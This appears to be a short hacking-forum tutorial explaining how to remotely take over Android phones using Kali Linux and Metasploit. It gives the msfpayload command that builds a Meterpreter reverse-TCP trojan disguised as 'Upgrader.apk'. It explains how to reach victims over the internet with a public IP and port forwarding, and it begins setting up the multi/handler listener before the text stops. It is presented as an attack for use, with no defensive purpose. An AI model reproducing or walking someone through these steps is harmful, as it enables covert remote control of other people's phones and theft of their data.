HOW TOHack Android Using Kali (Remotely)
Hello Hackers! Welcome to my 2nd Post:
This is a tutorial explaining how to hack android phones with Kali.
I can't see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)
This is a tutorial explaining how to hack android phones with Kali.
I can't see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)
Step 1: Fire-Up Kali:
- Open a terminal, and make a Trojan .apk
- You can do this by typing :
- msfpayload android/meterpreter/reverse_tcp LHOST= R > /root/Upgrader.apk (replace LHOST with your own IP)
- You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)
Step 2Open Another Terminal:
- Open another terminal until the file is being produced.
- Load metasploit console, by typing : msfconsole
Step 3Set-Up a Listener:
- After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler